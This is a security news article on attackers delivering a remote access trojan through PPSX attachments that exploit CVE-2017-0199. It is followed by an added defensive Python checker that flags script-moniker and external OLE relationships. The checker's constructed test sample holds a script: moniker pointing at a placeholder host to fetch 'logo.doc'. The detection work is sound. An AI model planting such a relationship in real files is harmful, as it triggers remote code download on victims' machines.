Security experts at Trend Micro recently revealed how criminal hackers are abusing the CVE-2017-0199 security flaw, which lets them bypass detection by anti-virus vendors and install malware on Windows PCs using Microsoft PowerPoint Slide Show files. CVE-2017-0199 was reported by security researchers as a zero-day remote code execution vulnerability, used by cyber criminals to exploit a flaw in the Microsoft Office Windows Object Linking and Embedding (OLE) interface and attack Windows computers with noxious threats.
Attackers usually exploit the vulnerability using malicious RTF (Rich Text Format) documents; the same method was used by the banking Trojan 'DRIDEX', reported earlier this year. However, malware researchers at Trend Micro have recently observed a new sample, detected as TROJ_CVE20170199.JVU, that exploits CVE-2017-0199 through a Microsoft PowerPoint Slide Show file. This is a new approach used by remote attackers to infect Windows computers with highly hazardous malware.
This is not the first time threat actors have exploited CVE-2017-0199 to attack Windows systems. According to the security experts, the attackers are now using this new method, and it could be abused by other malicious campaigns in the near future. One important thing to know about this attack is that the hackers deliver the exploit as a spam email attachment. When the attached file is opened by the user, the malware executes immediately and finally drops a remote access tool as its payload. In this attack, the crooks are targeting companies involved in manufacturing electronic products.
More interestingly, the sender address used in the phishing emails may look legitimate and appear to be an important message from a business partner. However, the user finds nothing related to their business in the attachment, only a PPSX file. Once the malicious PowerPoint Slide Show file is opened, it displays the text 'CVE-2017-8570', which is yet another MS Office vulnerability. In reality, despite the displayed text, the exploit is CVE-2017-0199 according to the research report published by Trend Micro; this is thought to be a leftover mistake by the attackers, which they did not bother to change.
After running the sample, the researchers found that PowerPoint initialized the script moniker and then ran the malicious payload through the PowerPoint Show animations feature. Once the flaw is successfully exploited, it downloads a file named 'logo.doc' (detected as JS_DLOADER.AUSYVT) from the Internet. This file runs a PowerShell command to download and execute another malware file, RATMAN.EXE, which is a Trojan. Because the exploit has mostly been used to deliver compromised .RTF documents, most detection methods for CVE-2017-0199 focus on RTF files, and a PPSX-based attack can slip past them. One of the easiest ways to protect yourself from this attack is to download and apply the patch Microsoft released in April this year that addresses CVE-2017-0199.
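As an added, defender-side example (not code from the article or from Trend Micro), the following Python script inspects the relationship parts inside a PPSX/PPTX package, which is a ZIP of XML parts, and flags any relationship that uses the script: moniker mentioned above or that attaches an OLE object from an external target. Ordinary hyperlinks, which are also marked external, are left alone. The minimal ZIP layout, the two sample decks and the placeholder host are constructed for this example; the relationship type URIs are the standard OOXML ones.

```python
"""Flag OOXML presentations (PPSX/PPTX) whose relationship parts reference a
script: moniker or an externally sourced OLE object, the pattern behind the
PPSX variant of CVE-2017-0199 described in the article.
Added example; not code from Trend Micro or the original article."""
import io
import zipfile
from xml.etree import ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"


def find_suspicious_relationships(ppsx_bytes):
    """Return (rels part, relationship Id, Target) for every relationship that
    either uses the script: moniker or is an OLE object with an external target.
    Hyperlinks (TargetMode="External" with the hyperlink type) are legitimate
    and are not reported."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(ppsx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                # A .rels part that is not well-formed XML is itself unusual; report it.
                findings.append((name, "?", "<unparseable .rels part>"))
                continue
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                target = rel.get("Target", "")
                rel_type = rel.get("Type", "")
                external = rel.get("TargetMode", "Internal") == "External"
                if target.lower().startswith("script:") or (external and rel_type == OLE_REL_TYPE):
                    findings.append((name, rel.get("Id", "?"), target))
    return findings


def build_sample_deck(slide_rels_xml):
    """Build a minimal constructed ZIP containing only the parts the checker
    reads. It is not a presentation PowerPoint would open; only the .rels
    layout matters for the example."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types/>')
        zf.writestr("ppt/slides/slide1.xml", "<sld/>")
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", slide_rels_xml)
    return buf.getvalue()


# Constructed benign deck: one ordinary hyperlink, which must not be flagged.
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
      Target="https://example.invalid/agenda" TargetMode="External"/>
</Relationships>"""

# Constructed suspicious deck: an OLE object whose target is a script: moniker
# pointing at a remote document (placeholder host, no real payload).
SUSPICIOUS_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId3" Type="{OLE_REL_TYPE}"
      Target="script:http://placeholder.invalid/logo.doc" TargetMode="External"/>
</Relationships>"""

BENIGN_DECK = build_sample_deck(BENIGN_RELS)
SUSPICIOUS_DECK = build_sample_deck(SUSPICIOUS_RELS)

if __name__ == "__main__":
    for label, deck in (("benign", BENIGN_DECK), ("suspicious", SUSPICIOUS_DECK)):
        hits = find_suspicious_relationships(deck)
        print(f"{label}: {'FLAGGED' if hits else 'clean'} {hits}")
```

To check a real attachment, pass `open(path, "rb").read()` to `find_suspicious_relationships`. The check works on the XML inside the ZIP container, which is why signatures written for RTF control words never see it; it is a triage aid to run on mail-gateway attachments alongside patching, not a replacement for the April update.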